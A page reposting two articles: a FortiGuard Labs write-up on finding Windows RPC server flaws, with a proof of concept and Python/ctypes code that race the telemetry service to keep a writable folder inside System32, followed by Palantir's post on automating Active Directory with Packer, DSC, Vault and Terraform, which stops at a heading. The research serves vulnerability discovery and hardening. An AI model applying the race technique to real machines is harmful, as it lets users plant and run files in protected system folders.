RPC Bug Hunting Case Studies

( Original text by Wayne Chin Yick Low )

In late August of 2018, a Windows local privilege escalation zero-day exploit was released by a researcher who goes by the Internet moniker SandboxEscaper. In less than two weeks from the time the zero-day was published on the Internet, the exploit was picked up by malware authors, as stated by ESET, and caused a bit of chaos in the InfoSec community. This incident also raised FortiGuard Labs' awareness.

FortiGuard Labs believes that understanding how this attack works will significantly help other researchers find vulnerabilities similar to the bug that SandboxEscaper found in the Windows Task Scheduler. In this blog post, we will discuss our approach to finding privilege escalation by abusing a symbolic link on an RPC server.

It turns out that Windows Task Scheduler had a flaw in one of the Remote Procedure Call (RPC) Application Programming Interfaces (APIs) it exposes via an RPC server. In fact, most RPC servers are hosted by system processes running with local system privilege, and they allow RPC clients with lower privileges to interact with them. As with other software, these RPC servers might be susceptible to issues such as denial of service, memory corruption, and logical errors. In other words, an attacker could leverage any vulnerability that might exist in an RPC server.

One of the reasons this zero-day exploit became so popular so quickly is that the underlying vulnerability is very simple to exploit. It is caused by a program logic error, which is relatively easy to spot when the correct tools and techniques are used. This particular kind of privilege escalation vulnerability is typically exploited by using a bogus symbolic link to redirect privileged file or folder operations, which in turn can result in privilege elevation for a normal user. For those interested, there are plenty of resources about symbolic link attacks shared by James Forshaw from Google Project Zero.

RPC Server Runtime and Static Analysis Prerequisites

When starting research on a new topic, it is always a good idea to look around to see if there are any available open source tools you can leverage before writing your own from scratch. Fortunately, Microsoft RPC is a well-known protocol that has been thoroughly reverse-engineered by researchers over the past couple of decades. As a result, researchers have open-sourced a tool named RpcView, which is very handy for identifying RPC services running on the Windows operating system. This is definitely one of my favourite RPC tools, with many useful features such as searching by RPC interface Universally Unique Identifier (UUID), RPC interface names, etc.

However, it does not serve our purpose here, which is to decompile and export all of the RPC information into a text file. Fortunately, upon reading the source code we found that the authors had included the functionality we need, but it is not enabled by default and can only be triggered in debug mode with a specific command-line parameter. Because of this limitation, we enabled and adapted the existing DecompileAllInterfaces function into the RpcView GUI. If you are interested in using this feature, our custom RpcView tool is available on our GitHub repository. We discuss the benefit of the "Decompile All Interfaces" feature in the next section.


Figure 1: RpcView Decompile All Interfaces feature

When analysing the behaviour of an RPC server, we always call the APIs exposed via its RPC interface. We can interact with an RPC server of interest by sending an RPC request from an RPC client to the server and then observing its behaviour using the Process Monitor tool from Sysinternals. In my opinion, the most convenient way to do this is by scripting rather than writing a C/C++ RPC client, which requires program compilation and is time consuming.

Instead, we are going to use PythonForWindows. It provides abstractions around some Windows features in a Pythonic way and relies heavily on Python's ctypes. It also includes an RPC library that provides convenient wrapper functions, which save us time when writing an RPC client. For example, a typical RPC client binary needs to define the interface definition language, and you need to manually implement the binding operation, which usually involves some C++ code. Listing 1 and Listing 2 below illustrate the difference between scripting and programming the RPC client with minimal error-handling code.


import sys
import ctypes
import windows.rpc
import windows.generated_def as gdef
from windows.rpc import ndr

StorSvc_UUID = r"BE7F785E-0E3A-4AB7-91DE-7E46E443BE29"

class SvcSetStorageSettingsParameters(ndr.NdrParameters):
    MEMBERS = [ndr.NdrShort, ndr.NdrLong, ndr.NdrShort, ndr.NdrLong]

def SvcSetStorageSettings():
    print "[+] Connecting...."
    client = windows.rpc.find_alpc_endpoint_and_connect(StorSvc_UUID, (0,0))
    print "[+] Binding...."
    iid = client.bind(StorSvc_UUID, (0,0))
    params = SvcSetStorageSettingsParameters.pack([0, 1, 2, 0x77])
    print "[+] Calling SvcSetStorageSettings"
    result = client.call(iid, 0xb, params)
    if len(str(result)) > 0:
        print " [*] Call executed successfully!"
        stream = ndr.NdrStream(result)
        res = ndr.NdrLong.unpack(stream)
        if res == 0:
            print " [*] Success"
        else:
            print " [*] Failed"

if __name__ == "__main__":
    SvcSetStorageSettings()

Listing 1: SvcSetStorageSettings using PythonForWindows RPC Client


RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
{
    RPC_STATUS status;
    RPC_BINDING_HANDLE v5;
    RPC_SECURITY_QOS SecurityQOS = {};
    RPC_WSTR StringBinding = nullptr;
    RPC_BINDING_HANDLE Binding;

    StringBinding = 0;
    Binding = 0;
    status = RpcStringBindingComposeW(L"BE7F785E-0E3A-4AB7-91DE-7E46E443BE29", L"ncalrpc", nullptr, nullptr, nullptr, &StringBinding);
    if (status == RPC_S_OK)
    {
        status = RpcBindingFromStringBindingW(StringBinding, &Binding);
        RpcStringFreeW(&StringBinding);
        if (!status)
        {
            SecurityQOS.Version = 1;
            SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
            SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
            SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;

            status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
            if (!status)
            {
                v5 = Binding;
                Binding = 0;
                *binding_handle = v5;
            }
        }
    }

    if (Binding)
        RpcBindingFree(&Binding);
    return status;
}

VOID RpcSetStorageSettings()
{
    RPC_BINDING_HANDLE handle;
    RPC_STATUS status = CreateBindingHandle(&handle);

    if (status != RPC_S_OK)
    {
        _tprintf(TEXT("[-] Error creating handle %d\n"), status);
        return;
    }

    RpcTryExcept
    {
        if (!SUCCEEDED(SvcSetStorageSettings(0, 1, 2, 0x77)))
        {
            _tprintf(TEXT("[-] Error calling RPC API\n"));
            return;
        }
    }
    RpcExcept(1)
    {
        _tprintf(TEXT("[-] RPC exception: 0x%x\n"), RpcExceptionCode());
    }
    RpcEndExcept
}

Listing 2: SvcSetStorageSettings using C++ RPC Client

After the RPC client successfully executed the corresponding RPC API, we used Process Monitor to monitor its activities. Process Monitor is helpful in dynamic analysis as it provides event-based API runtime information. It is worth mentioning that one of the lesser-known features of Process Monitor is its call-stack information, shown in Figure 2, which enables you to trace the API calls of an event.


Figure 2: Process Monitor API call-stack

We can use the Address and Path information to pinpoint the corresponding module and function routine when doing static analysis in a disassembler such as IDA Pro. This is useful because sometimes you might not be able to spot the potential symbolic link attack patterns using the Process Monitor output alone. This is where static analysis with a disassembler comes into play, helping us discover race condition issues, which will be discussed in the second part of this blog series.
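As a quick illustration of how the call-stack data maps into the disassembler, the offset you look up in IDA Pro is simply the return address minus the module base shown in the Process tab of Event Properties; the base address below is a made-up example.

# Minimal sketch: turn a Process Monitor call-stack address into a module
# offset that can be located in IDA Pro. The module base is hypothetical;
# 0x15A091 is the diagtrack.dll offset discussed later in this post.
module_base    = 0x7FFB2D260000   # base of diagtrack.dll (example value)
return_address = 0x7FFB2D3BA091   # "Address" column from the call-stack window

rva = return_address - module_base
print("diagtrack.dll+0x{:X}".format(rva))   # prints diagtrack.dll+0x15A091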

Microsoft Universal Telemetry Client (UTC) Case Study

Have you ever heard that Microsoft collects customer information, data, and file details on Windows 10 and above? Have you ever wondered how this works? If you are interested, you can read this excellent article about the mechanism behind UTC.

To start the next phase of our analysis, we first exported all of the RPC interfaces from the RpcView GUI to text files. The resulting text files contained all of the RPC APIs callable on the RPC servers. From these output files we looked for RPC APIs that accept a wide string as input, until we encountered one of the more interesting RPC interfaces in diagtrack.dll. We later confirmed that this DLL component is responsible for implementing the UTC functionality, especially judging from the name Microsoft Windows Diagnostic Tracking in its description shown in the RpcView GUI.


Figure 3: RpcView reveals UTC’s DLL component, and one of its RPC interfaces accepts wide string as input

Keep in mind that our goal here is to find an API that accepts an input file path and could eventually lead to privilege escalation, as demonstrated by the Windows Task Scheduler bug. But that requirement alone gives us 16 possible APIs, as shown in Figure 3. Obviously, we need to filter out the APIs that are not of interest, so we used IDA Pro and started with static analysis to find out which APIs we should dive into.

I normally start by locating the RPC function RpcServerRegisterIf, which is typically used to register an interface specification with an RPC server. The interface specification contains the definition of the RPC interface hosted by a particular RPC server. According to MSDN, the interface specification is passed in the first parameter of the function and is represented by the RPC_SERVER_INTERFACE data structure with the following definition:


struct _RPC_SERVER_INTERFACE
{
    unsigned int Length;
    RPC_SYNTAX_IDENTIFIER InterfaceId;
    RPC_SYNTAX_IDENTIFIER TransferSyntax;
    PRPC_DISPATCH_TABLE DispatchTable;
    unsigned int RpcProtseqEndpointCount;
    PRPC_PROTSEQ_ENDPOINT RpcProtseqEndpoint;
    void *DefaultManagerEpv;
    const void *InterpreterInfo;
    unsigned int Flags;
};

The InterpreterInfo field of the interface specification is a pointer to the MIDL_SERVER_INFO data structure, which contains a DispatchTable pointer that holds the information about the interface APIs supported by that specific RPC interface. This is indeed the field we are looking for.


typedef struct _MIDL_SERVER_INFO_
{
    PMIDL_STUB_DESC pStubDesc;
    const SERVER_ROUTINE* DispatchTable;
    PFORMAT_STRING ProcString;
    const unsigned short* FmtStringOffset;
    const STUB_THUNK* ThunkTable;
    PRPC_SYNTAX_IDENTIFIER pTransferSyntax;
    ULONG_PTR nCount;
    PMIDL_SYNTAX_INFO pSyntaxInfo;
} MIDL_SERVER_INFO, *PMIDL_SERVER_INFO;

Figure 4 is an animation that illustrates how we typically traverse the import address table to determine the DispatchTable within IDA Pro.


Figure 4: Determining RPC exposed APIs by traversing IAT within IDA Pro

After determining the UTC interface APIs with the UtcApi prefix, as shown in Figure 4, we tried to determine whether any of these interface APIs would lead to Access Control List (ACL) APIs such as SetNamedSecurityInfo and SetSecurityInfo. We are interested in these ACL APIs because they are used to change the discretionary access control list (DACL) in the security descriptor of an object, whether it is a file, directory, or registry object. Another useful and probably underused feature in IDA Pro is its proximity view, which displays the call graph of a function routine. We used the proximity view to find the function routines that are referenced or called by the ACL APIs mentioned above.


Figure 5: IDA’s Proximity view that shows the correlation between SetSecurityInfo and the function routines in diagtrack.dll
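The same hunt for ACL API references can also be scripted. The following IDAPython sketch assumes the target module is loaded in IDA and that the import is named either SetSecurityInfo or __imp_SetSecurityInfo; it simply lists the functions referencing the import, as a convenience alternative to walking the proximity view by hand.

# Hedged IDAPython sketch: list functions referencing the SetSecurityInfo import.
import idc
import idautils
import ida_funcs

for name in ("SetSecurityInfo", "__imp_SetSecurityInfo"):
    ea = idc.get_name_ea_simple(name)
    if ea == idc.BADADDR:
        continue
    for xref in idautils.XrefsTo(ea):
        func = ida_funcs.get_func(xref.frm)
        if func:
            print("%s is referenced from %s at 0x%X" % (
                name, ida_funcs.get_func_name(func.start_ea), xref.frm))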

However, IDA Pro did not yield any results when we tried to look for a correlation between SetSecurityInfo and UtcApi. Digging further, we found that UtcApi places the client's RPC request into a work item queue that is processed by an asynchronous thread. As shown in Figure 5, SetSecurityInfo is executed when Microsoft::Diagnostic::EscalationWorkItem::Execute is triggered. Basically, this is a callback function that is responsible for executing escalation requests kept in the work item submitted by the RPC client.

At this point, we needed to figure out how to submit an escalation request. After playing around with various applications, we came across the Microsoft Feedback Hub, a Universal Windows Platform (UWP) application that comes by default with Windows 10. Sometimes you might find it useful to debug a UWP application. Unfortunately, you cannot open or attach a UWP application directly in WinDbg and expect it to work magically. However, UWP application debugging can be enabled via the PLMDebug tool that comes with the Windows Debugger included in the Windows 10 SDK. You can first determine the full package family name of the Feedback Hub via the built-in PowerShell cmdlet:


PS C:\Users\researcher> Get-AppxPackage | Select-String -pattern "Feedback"
Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe
PS C:\Users\researcher> cd "c:\Program Files\Windows Kits\10\Debuggers\x86"
PS C:\Program Files\Windows Kits\10\Debuggers\x86>
PS C:\Program Files\Windows Kits\10\Debuggers\x86> .\plmdebug.exe /query
Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe
Package full name is Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe.
Package state: Unknown
SUCCEEDED
PS C:\Program Files\Windows Kits\10\Debuggers\x86>

After we obtained the full package name, we enabled UWP debugging for the Feedback Hub using PLMDebug again:


c:\Program Files\Windows Kits\10\Debuggers\x86>plmdebug.exe /enabledebug Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe "c:\program files\windows kits\10\Debuggers\x86\windbg.exe"
Package full name is Microsoft.WindowsFeedbackHub_1.1809.2971.0_x86__8wekyb3d8bbwe.
Enable debug mode
SUCCEEDED

The next time you launch the Feedback Hub, the application will be executed and attached to WinDbg automatically.


Figure 6: Determining the offset of the API call from Process Monitor Event Properties

After we launched the Feedback Hub, we followed the on-screen instructions from the application and started seeing activity in Process Monitor. This is a good sign, as it implies that we are on track. When we then looked into the call stack of the highlighted SetSecurityFile event, we found the return address of the ACL API SetSecurityInfo at offset 0x15A091 (the base address of diagtrack.dll can be found in the Process tab of Event Properties). As you can see, this offset falls within the routine Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile, as shown in the disassembler in Figure 6, and it also appears in the proximity view shown in Figure 5. This proves that we can utilize the Feedback Hub to reach our desired code path.

In addition, the Process Monitor output also told us that this event attempts to set the DACL of a file object, but determining how the file object was derived through static analysis alone might be time-consuming. Fortunately, we can attach a local debugger, running with administrative rights, to the svchost.exe process hosting the UTC service, because the process is not protected by the Protected Process Light (PPL) mechanism. This gives us the flexibility to dynamically debug the UTC service to understand how the file path is retrieved.
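To attach the debugger, you first need the PID of the svchost.exe instance hosting the service. One way to get it is to query the Service Control Manager; the sketch below assumes the service short name is DiagTrack, which is the usual name for the UTC service.

# Hedged sketch: find the PID of the svchost.exe hosting the DiagTrack service
# by parsing "sc queryex" output, then attach WinDbg to that PID.
import re
import subprocess

def get_service_pid(service_name="DiagTrack"):
    output = subprocess.check_output(["sc", "queryex", service_name], text=True)
    match = re.search(r"PID\s*:\s*(\d+)", output)
    return int(match.group(1)) if match else None

if __name__ == "__main__":
    print("Attach the debugger to PID", get_service_pid())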

Under the hood, all feedback details and attachments are kept in a temporary folder with the format %DOCUMENTS%\FeedbackHub\<guid>\diagtracktempdir<random_decimals> after you submit them via the Feedback Hub. The random decimal number appended to diagtracktempdir is generated via the BCryptGenRandom API, which means that the generated number is practically unpredictable. But one of the most important criteria in a symbolic link attack is being able to predict the file or folder name, so the random diagtracktempdir name increases the difficulty of exploiting the symbolic link vulnerability. Therefore, we dove into other routines to find other potential issues.

While we were trying to understand how the diagtracktempdir security descriptor is set, we realized that the folder is created with the explicit security descriptor string O:BAD:P(A;OICI;GA;;;BA)(A;OICI;GA;;;SY), which implies that the DACL of the object grants access to Administrators and the local system user only. However, the explicit security descriptor is ignored if the following registry key is set accordingly:

HKEY_LOCAL_MACHINE\Software\Microsoft\Diagnostics\DiagTaskTestHooks\Volatile

“NoForceCopyOutputDirAcl” = 1

In a nutshell, diagtracktempdir is forced to use the explicit security descriptor when the above registry key is not present; otherwise the default DACL is applied to the folder, which could potentially raise some security issues, as no impersonation token is used during folder creation. Nevertheless, you can only bypass the explicit security descriptor on this folder if you have an arbitrary registry write vulnerability. This is not what we are pursuing, so our best bet is to look into Process Monitor again:


Figure 7: Setting DACLs and renaming folder diagtracktempdir

Basically we can summarize the operations labelled in Figure 7 as follows:

1.     Grant access to the current logged-in user on diagtracktempdir under local system privilege

2.     Rename diagtracktempdir to the GUID-styled folder under impersonation

3.     Revoke access of the current logged-in user on diagtracktempdir under impersonation

The following code snippet corresponds to the operations shown in Figure 7:


bQueryTokenSuccessful = UMgrQueryUserToken(hContext, v81, &hToken);
if ( hToken && hToken != -1 )
{
    // This will GRANT access of the current logged in user to the directory in the specified handle
    bResultCopyDir = Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile(&hToken, hDir, Sid, GRANT_ACCESS);
    if ( !ImpersonateLoggedOnUser(hToken) )
    {
        bResultCopyDir = 0x80070542;
    }
}
// Rename diagtracktempdir to GUID-styled folder name
bResultCopyDir = Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle(SecurityDescriptor, v65, Length);
if ( bResultCopyDir >= 0 )
{
    boolRenamedSuccessful = 1;
    // This will REVOKE access of the current logged in user to the directory in the specified handle
    bSetAclSucessful = Microsoft::Diagnostics::Utils::FileSystem::SetTokenAclOnFile(&hToken, hDir, Sid, REVOKE_ACCESS);
    if (bSetAclSucessful)
    {
        // Cleanup and RevertToSelf
        return;
    }
}
else
{
    lambda_efc665df8d0c0615e3786b44aaeabc48_::operator_RevertToSelf(&hTokenUser);
    // Delete diagtracktempdir folder and its contents
    lambda_8963aeee26028500c2a1af61363095b9_::operator_RecursiveDelete(&v83);
}

Listing 3: Grant and then revoke access on diagtracktempdir

From Listing 3, we can tell what happens when the file rename operation fails: if bResultCopyDir has a value less than 0, execution proceeds to the RecursiveDelete function call. It is also worth noting that it calls the RevertToSelf function to terminate impersonation before the RecursiveDelete function is called, which means the target directory and its contents are deleted under local system privilege. That would allow us to achieve arbitrary file deletion if we managed to use a symbolic link to redirect diagtracktempdir to an arbitrary folder. Fortunately, Microsoft has mitigated the potential reparse point deletion issue: the RecursiveDelete function explicitly skips any directory or folder that has the FILE_ATTRIBUTE_REPARSE_POINT flag set, which is typically set for a junction folder. So we can confirm that this recursive deletion routine does not pose any security risk.

Since we are not able to demonstrate arbitrary file deletion, we decided to show how to write arbitrary files to the diagtracktempdir directory instead. Looking into the code, we realized that the UTC service does not revoke the security descriptor of diagtracktempdir for the currently logged-in user after the recursive deletion routine has completed. This is intentional, because there is no need to impose a new DACL on a folder that is about to be removed, which would be redundant work. But this also opens up a potential race condition opportunity for an attacker to prevent the deletion of the escalated diagtracktempdir by creating a file with an exclusive file handle in the same directory. The RecursiveDelete function encounters a sharing violation when attempting to open and delete the file with the exclusive file handle and then exits the operation gracefully. As a result, the attacker can drop and execute files in the escalated diagtracktempdir inside a restricted directory, for example C:\WINDOWS\System32.
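The exclusive-handle trick can be sketched with a few lines of ctypes; the folder name below is only an example, and the key point is that dwShareMode = 0 prevents any other process, including the UTC service, from opening or deleting the file while the handle stays open.

# Hedged sketch of the exclusive-handle trick described above, using ctypes.
# The path is hypothetical; what matters is dwShareMode = 0.
import ctypes
from ctypes import wintypes

GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 2
FILE_ATTRIBUTE_NORMAL = 0x80
INVALID_HANDLE_VALUE = wintypes.HANDLE(-1).value

CreateFileW = ctypes.windll.kernel32.CreateFileW
CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
                        wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
                        wintypes.HANDLE]
CreateFileW.restype = wintypes.HANDLE

def hold_exclusive_handle(path):
    handle = CreateFileW(path, GENERIC_READ | GENERIC_WRITE,
                         0,                      # dwShareMode = 0 -> exclusive
                         None, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, None)
    if handle == INVALID_HANDLE_VALUE:
        raise ctypes.WinError()
    return handle   # keep this open for as long as the folder must survive

# Example (hypothetical folder name):
# hold_exclusive_handle(u"C:\\Windows\\System32\\diagtracktempdir12345\\z")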

So the next question is, how do we make the file rename operation fail? Looking into the underlying implementation of Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle, we see that it is essentially a wrapper around the SetFileInformationByHandle API. It appears that the underlying kernel functions derived from this API always obtain a file handle to the parent directory with write access. For example, if the handle currently references c:\blah\abc, it will attempt to get a file handle with write access to c:\blah. However, if we specify a directory to which the currently logged-in user has no write access, Microsoft::Diagnostics::Utils::FileSystem::MoveFileByHandle will fail to execute properly. The following file paths are good candidates, as they are known to be restricted folders that disallow folder creation by a normal user account:

·       C:\WINDOWS\System32

·       C:\WINDOWS\tasks

There should not be any problem winning this race condition, as some of the escalation requests involve writing a bunch of log files to our controlled diagtracktempdir, and they take some time to be deleted. So we should be able to win the race most of the time on a modern system with multiple cores if we successfully create an exclusive file handle in our target directory.

Next, we needed to find a way to trigger the code path programmatically using the correct parameters required by UtcApi. Being able to debug and set a breakpoint on the RPC function NdrClientCall within the Feedback Hub really makes our life easier. The debugger reveals the scenario ID as well as the escalation path that we should send to UtcApi. In this case, we are going to use the scenario ID {1881A45E-01FD-4452-ACE4-4A23666E66E3}, as it seems to consistently show up whenever the UtcApi_EscalateScenarioAsync routine is triggered, and it led to our desired code path on the RPC server. Take note that the escalation path also allows us to control where diagtracktempdir will be created.


Breakpoint 0 hit
eax=0c2fe7b8 ebx=032ae620 ecx=0e8be030 edx=00000277 esi=0c2fe780 edi=0c2fe744
eip=66887154 esp=0c2fe728 ebp=0c2fe768 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
Helper+0x37154:
66887154 ff15a8f08866 call dword ptr [Helper!DllGetActivationFactory+0x6d31 (6688f0a8)] ds:0023:6688f0a8={RPCRT4!NdrClientCall4 (76a74940)}
0:027> dds esp l9
0c2fe728 66892398 Helper!DllGetActivationFactory+0xa021
0c2fe72c 66891dca Helper!DllGetActivationFactory+0x9a53
0c2fe730 0e8be030
0c2fe734 1881a45e // Scenario ID
0c2fe738 445201fd
0c2fe73c 234ae4ac
0c2fe740 e3666e66
0c2fe744 00000000
0c2fe748 032ae620 // Escalation path
0:027> du 032ae620
032ae620 "E:\researcher\Documents\Feedback"
032ae660 "Hub\{e04b7a09-02bd-42e8-a5a8-666"
032ae6a0 "b5102f5de}\{e04b7a09-02bd-42e8-a"
032ae6e0 "5a8-666b5102f5de}"

As a result, the prototype of UtcApi_EscalateScenarioAsync looks like the following:


long UtcApi_EscalateScenarioAsync (
    [in] GUID ScenarioID,
    [in] int16 unknown,
    [in] wchar_t* wszEscalationPath,
    [in] long unknown2,
    [in] long unknown3,
    [in] long num_of_keyval_pairs,
    [in] wchar_t **keys,
    [in] wchar_t **values);

Putting all of this together, our proof of concept (PoC) flows like this:

  • Create an infinite thread that will monitor our target directory, e.g. C:\WINDOWS\SYSTEM32, in order to capture the folder name of diagtracktempdir
  • Create another infinite thread that will create an exclusive file handle on C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal}\z (a minimal sketch of these two threads follows this list)
  • Call UtcApi_EscalateScenarioAsync(1881A45E-01FD-4452-ACE4-4A23666E66E3) to trigger Microsoft::Diagnostic::EscalationWorkItem::Execute
  • C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal}\z will have been created successfully if we have won the race
  • After that, the attacker can write and execute arbitrary files in the escalated folder C:\WINDOWS\SYSTEM32\diagtracktempdir{random_decimal} to bypass legitimate programs that have always assumed that the %SYSTEM32% directory contains only legitimate OS files
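A rough, standard-library-only sketch of the first two steps might look like the following; the target directory and file name are examples, and the stricter share-mode-0 handle is shown in the earlier ctypes sketch.

# Hedged sketch of PoC steps 1 and 2: watch for the diagtracktempdir folder to
# appear in the target directory, then immediately create and hold a file
# inside it so the service's RecursiveDelete hits a sharing violation.
import glob
import os
import time

TARGET_DIR = r"C:\Windows\System32"

def wait_for_diagtracktempdir():
    while True:
        hits = glob.glob(os.path.join(TARGET_DIR, "diagtracktempdir*"))
        if hits:
            return hits[0]
        time.sleep(0.001)   # tight polling loop; we need to win the race

def hold_file_open(folder):
    # CPython opens files without FILE_SHARE_DELETE, so keeping this handle
    # open should be enough to make deletion fail; for a fully exclusive
    # handle (share mode 0) use the earlier ctypes sketch instead.
    return open(os.path.join(folder, "z"), "wb")

if __name__ == "__main__":
    folder = wait_for_diagtracktempdir()
    handle = hold_file_open(folder)
    print("Holding %s open, %s should now survive deletion" % (handle.name, folder))
    while True:
        time.sleep(1)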

The result of our PoC demonstrates the potential ways to create arbitrary files and folders in a static folder under a restricted directory by leveraging the UTC service.


Figure 8: PoC allowed creating arbitrary files in diagtracktempdir

To reiterate, this PoC does not pose a security risk to the Windows OS without also being able to control or rename the diagtracktempdir folder, as stated by MSRC. However, it is common to see malware authors utilizing different techniques, such as User Account Control (UAC) bypass, to write files to a Windows system folder with the intention of evading heuristic detection. In fact, while exploring potential file paths to be used in the PoC, we found that C:\WINDOWS\SYSTEM32\Tasks grants write and execute permissions to normal user accounts, but not read permission, which is why this folder is also one of the notorious target paths used by malware authors to store malicious files.

Conclusion

In this first part of the blog series, we have shown our approach to finding a potential security risk in a Windows RPC server using various available tools and online resources. We also covered some of the fundamental knowledge you need to reverse engineer an RPC server. We strongly believe there are still other potential security risks in Windows RPC servers, and we are determined to help harden them further. In the second part of this blog series, we will continue our investigation and improve our methodology, which will lead us to uncover other RPC server vulnerabilities.

Active Directory as Code

( Original text by Palantir )

Windows Automation used to be hard, or at least not straightforward, manifesting itself in right-click-to-glory deployments where API-based management was a second thought. But the times, they are a-changin’! With the rise of DevOps, the release of Windows Server 2016, and the growth of the PowerShell ecosystem, opportunities to redesign traditional Windows infrastructure have opened up.

One of the more prevalent Windows-based systems is Active Directory (AD) — a cornerstone in most enterprise environments which, for many, has remained an on-premise installation. At Palantir, we ❤️ Infrastructure as Code (see Terraforming Stackoverflow and Bouncer), so when we were tasked with deploying an isolated, highly available, and secure AD infrastructure in AWS, we started to explore ways we can apply Infrastructure as Code (IaC) practices to AD. The goal was to make AD deployments automated, repeatable, and configured by code. Additionally, we wanted any updates tied to patch and configuration management integrated with our CI/CD pipeline.

This post walks through the approach we took to solve the problem by outlining the deployment process including building AD AMIs using Packer, configuring the AD infrastructure using Terraform, and storing configuration secrets in Vault.

Packerizing Active Directory

Our approach to Infrastructure as Code involves managing configuration by updating and deploying layered, immutable images. In our experience, this reduces entropy, codifies configuration, and is more aligned with CI/CD workflows which allows for faster iteration.

Our AD image is a downstream layer on top of our standard Windows image built using a custom pipeline using Packer, Jenkins and AWS CodeBuild. The base image includes custom Desired State Configuration (DSC) modules which manage various components of Windows, Auto Scaling Group (ASG) lifecycle hooks, and most importantly, security tooling. By performing this configuration through the base image, we can enforce security and best practices regardless of how the image is consumed.

Creating a standardized AD image

The AD image can be broken down into the logical components of an instance lifecycle: initial image creation, instance bootstrapping, and decommissioning.

Image creation

It is usually best practice to front-load as much of the logic as possible into the initial build, since this process only happens once, whereas bootstrapping runs for each instance. This is less relevant when it comes to AD images, which tend to be lightweight with minimal package dependencies.

Desired State Configuration (DSC) modules

AD configuration has traditionally been a very GUI-driven workflow that has been quite difficult to automate. In recent years, PowerShell has become a robust option for increasing engineer productivity, but managing configuration drift has always been a challenge. Cue DSC modules.

DSC modules are a great way to configure the Windows environment, and keep it configured, with minimal user interaction. DSC configuration is run at regular intervals on the host and can be used not only to report drift, but to reinforce the desired state (similar to third-party configuration tools).

One of these modules is the Microsoft AD DSC module. To illustrate how DSC can be a force multiplier, here is a quick example of a group creation invocation. This might seem heavy-handed for a single group, but the real benefit is when you are able to iterate over a list of groups such as below for the same amount of effort. The initial content of Groups can be specified in a Packer build (static CSV) or generated dynamically from an external look-up.

Sample DSC configuration

<#
.SYNOPSIS
    Example demonstrating ingesting a list of N AD groups
    and creating their respective resources using a single code block.
    The AD groups can be baked in the AMI or retrieved from an
    external source
#>

$ConfigData = @{
    AllNodes = @(
        @{
            NodeName = '*'
            Groups   = (Get-Content "C:\dsc\groups.csv")
        }
    )
}

Configuration NodeConfiguration
{
    Import-DSCResource -ModuleName xActiveDirectory

    Node $AllNodes.NodeName {
        foreach ($group in $node.Groups) {
            xADGroup $group
            {
                GroupName = $group
                Ensure    = "Present"
                # additional params
            }
        }
    }
}

NodeConfiguration -ConfigurationData $ConfigData

We have taken this one step further by building additional modules to stand up a cluster from scratch. These modules handle everything from configuring core Windows features to deploying a new domain controller. By implementing these tasks as modules, we get the inherent DSC benefits for free, for instance reboot resilience and mitigation of configuration drift.

Bootstrap scripts

Secrets. Handling configuration secrets such as static credentials warrants additional consideration when it comes to a sensitive environment such as AD. Storing encrypted secrets on disk, manually entering them at bootstrap time, or a combination of the two are all sub-optimal solutions. We were looking for a solution that would:

  • Be API-driven so that we can plug it in to our automation
  • Address the secure introduction problem so that only trusted instances are able to gain access
  • Enforce role-based access control to ensure separation between the Administrators (who create the secrets) and instances (that consume the secrets)
  • Enforce a configurable access window during which the instances are able to access the required secrets

Based on the above criteria, we settled on using Vault to store secrets for most of our automated processes. We have further enhanced it by creating an ecosystem which automates the management of roles and policies, allowing us to grow at scale while minimizing administrative overhead. This allows us to easily permission secrets and control what has access to them, and for how long, by integrating Vault with AWS's IAM service. This, along with proper auditing and controls, gives us the best of both worlds: automation and secure secrets management.

Below is an example of how an EC2 instance might retrieve a token from a Vault cluster and use that token to retrieve secrets:
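A minimal sketch of that flow, assuming Vault's AWS EC2 auth method and hypothetical role and secret paths (the Vault address is the same placeholder used in the Terraform examples below), might look like this:

# Hedged sketch: an EC2 instance proves its identity to Vault with the
# PKCS7-signed instance identity document, receives a short-lived token,
# and uses that token to read a secret. Role and secret paths are made up.
import requests

VAULT_ADDR = "https://vault.secret.place"

def get_vault_token(role="ad-domain-controller"):
    pkcs7 = requests.get(
        "http://169.254.169.254/latest/dynamic/instance-identity/pkcs7",
        timeout=2).text.replace("\n", "")
    resp = requests.post("%s/v1/auth/aws/login" % VAULT_ADDR,
                         json={"role": role, "pkcs7": pkcs7})
    resp.raise_for_status()
    return resp.json()["auth"]["client_token"]

def get_secret(token, path="secret/ad/safe-mode-password"):
    resp = requests.get("%s/v1/%s" % (VAULT_ADDR, path),
                        headers={"X-Vault-Token": token})
    resp.raise_for_status()
    return resp.json()["data"]

if __name__ == "__main__":
    token = get_vault_token()
    print(get_secret(token))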

Configuring the instance. AWS ASGs automatically execute the user data (usually a PowerShell script) that is specified in their launch configuration. We also have the option to dynamically pass variables into the script to configure the instance at launch time. As an example, here we are setting the short and full domain names and specifying the Vault endpoint by passing them as arguments for bootstrap.ps1:

Terraform invocation

data "template_file" "userdata" {
template = "${file("${path.module}/bootstrap/bootstrap.ps1")}"

vars {
domain = "${var.domain_name}"
shortname = "${var.domain_short_name}"
vaultaddress = "${var.vault_addr}"
}
}
resource "aws_auto_scaling_group" "my_asg" {
# ...
user_data = "${data.template_file.userdata.rendered}"
}

Bootstrap script (bootstrap.ps1)

